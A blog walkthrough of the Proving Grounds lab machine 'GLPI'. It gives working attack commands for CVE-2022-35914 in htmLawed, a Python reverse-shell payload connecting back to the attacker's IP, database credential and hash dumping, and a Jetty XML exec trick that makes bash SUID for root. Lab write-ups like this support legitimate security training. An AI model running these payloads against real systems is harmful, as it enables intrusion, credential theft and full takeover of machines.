PG - GLPI

PG – GLPI

In this walk through, we will be going through the Exfiltrated room from Proving Grounds. This room is rated as Easy on the platform and it consist of exploitation of CVE-2022-35914 in order to get the initial foothold. With the DB creds in config files, we have to perform lateral movement and at last, privilege escalation is done via exploitation of a Jetty server instance running on an internal localhost. So, let’s get started without any delay.

GLPI

Machine Info:

TitleGLPI
IPaddress192.168.193.242
DifficultyEasy
OSLinux
DescriptionGLPI is an Easy rated Linux machine which requires exploitation of CVE-2022-35914 in order to get the initial foothold. With the DB creds in config files, the attacker have to perform lateral movement and at last, privilege escalation is done via exploitation of a Jetty server instance running on an internal localhost.

Enumeration:

  • I stared off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.193.242
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 12:51 IST

Nmap scan report for 192.168.193.242
Host is up (0.21s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2020-12062	5.0	https://vulners.com/prion/PRION:CVE-2020-12062
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2020-15778	4.4	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Authentication - GLPI
| vulners: 
|   cpe:/a:apache:http_server:2.4.41: 
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2020-11984	7.5	https://vulners.com/cve/CVE-2020-11984
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	1337DAY-ID-34882	7.5	https://vulners.com/zdt/1337DAY-ID-34882*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-36160	5.0	https://vulners.com/cve/CVE-2021-36160
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-30641	5.0	https://vulners.com/cve/CVE-2021-30641
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-9490	5.0	https://vulners.com/cve/CVE-2020-9490
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2020-13950	5.0	https://vulners.com/cve/CVE-2020-13950
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|     	CVE-2020-11993	4.3	https://vulners.com/cve/CVE-2020-11993
|_    	1337DAY-ID-35422	4.3	https://vulners.com/zdt/1337DAY-ID-35422*EXPLOIT*
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   207.77 ms 192.168.45.1
2   207.71 ms 192.168.45.254
3   208.58 ms 192.168.251.1
4   208.72 ms 192.168.193.242

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.48 seconds

nmap scan

  • Enumerated the web server on port 80 and it revealed a login panel for GLPI.

GLPI login panel

  • Fired gobuster on the target to reveal some hidden directories. It gives a bunch of directories back in the results.

gobuster dir -u http://192.168.193.242/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php

gobuster scan

  • Looked inside the files directories reveals directory listing of various assets related to the web application.

Index of /files

Initial Access:

  • Next, i looked into the /vendor directory which uses a HTMLawed 1.2.6 test application on it and it is vulnerable to CVE-2022-35914. Used the below exploit on it.

Exploit: https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh?source=post_page—–555ce2d9234e——————————–

#!/bin/bash


curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.193.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

htmLawedTest.php

  • I captured the request via Burpsuite and added the below parameters to the request before forwarding it to the server. Once the request is processed, we are able to get the contents of the /etc/passwd file.

sid=1rpcfmnkocd44m3mdtg1jfj7qm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd

Burpsuite POST request

dumping /etc/passwd file

  • Next, we will be using the below parameters to execute a command shell on the target giving us a connection back at our netcat listener.

sid=19r7u6o4pl0kn34q54le48sghm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.154",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

got initial access

Lateral Movement (Betty):

  • Once we are landed on a shell. Enumerated the file system for any file containing sensitive information. In the config_db.php file. Got the DB creds for GLPI database.

cat config_db.php

  • Used the found creds to log into the DB and dump all the contents of the user table that also includes the password hashes of the user.

mysql -u glpi -p glpi_db_password

show databases;
use glpi;
show tables;
select * from glpi_users

interacting with the DB

show tables;

select * from glpi_users;

dumping hashes

  • Once i got the password hash of user betty. I tried to update it with my generated password to get access as her. However, it didn’t seems to work.

betty: $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa

password: $2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS

update glpi_users SET password = '$2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS' where name = 'betty';

updating betty password

  • Looking around the other tables, i found the betty’s plaintext stored in glpi_itilfollowups table.

select * FROM glpi_itilfollowups\

Dumping glpi_itilfollowups table

  • Using the found password, logged into the target via SSH as user betty and captured the local flag.

logged in as betty via SSH

local flag

Privilege Escalation:

  • Next, enumerated the running processes on the target using the below command. It revealed that, a web server is running on localhost on port 8080.

ps auxww

ps auxww

  • Performed a SSH port forwarding to forward the connection of 8080 to my localport at 1234.

ssh -L 1234:localhost:8080 [email protected]

performing SSH port forwarding

  • Once the setup is processed successfully, i was able to access the web server on port 1234 at my localhost. The web server was running a Jetty server.

localhost:1234

  • Found out that the running Jetty server is vulnerable to the below exploit.

Resource: https://twitter.com/ptswarm/status/1555184661751648256?lang=en

Twitter post related to Jetty

  • First, we have to create a root.sh file containing commands that will create a copy of the bash binary in the working folder and apply SUID rights to it. We will then use the XML code below to execute the root.sh file. For that, just place the file inside the jetty installation.

Exploit: https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page—–555ce2d9234e——————————–

<?xml version="1.0"?>  
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">  
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">  
    <Call class="java.lang.Runtime" name="getRuntime">  
        <Call name="exec">  
            <Arg>  
                <Array type="String">  
                    <Item>/tmp/root.sh</Item>  
                </Array>  
            </Arg>  
        </Call>  
    </Call>  
</Configure>

cd /opt/jetty/jetty-base/webapps/
echo "chmod +s /bin/bash" > /tmp/root.sh
chmod +x /tmp/root.sh

nano shell.xml

creating root.sh

  • Once the bash binary is available to us. Execute it using the below command and become root.

bash -p

got root

  • Captured the root flag and completed the machine.

proof flag

Also Read: PG – Exfiltrated

Conclusion:

Conclusion

So that was GLPIfor you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found out that it is running GLPI and got a htmlLawed directory. Looked online for any known exploit and found out that it is vulnerable to CVE-2022-35914. Used the same and got the initial access on the target. Next, found DB creds in config_db.php file. Using the creds, enumerated the Database and got user betty plain text password from glpi_itilfollowups table. Performed lateral movement via SSH and user betty creds. Moving on, perform SSH port forwarding of port 8080 and found a jetty server running. Exploited it using a exploit discussed on a twitter post and got root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top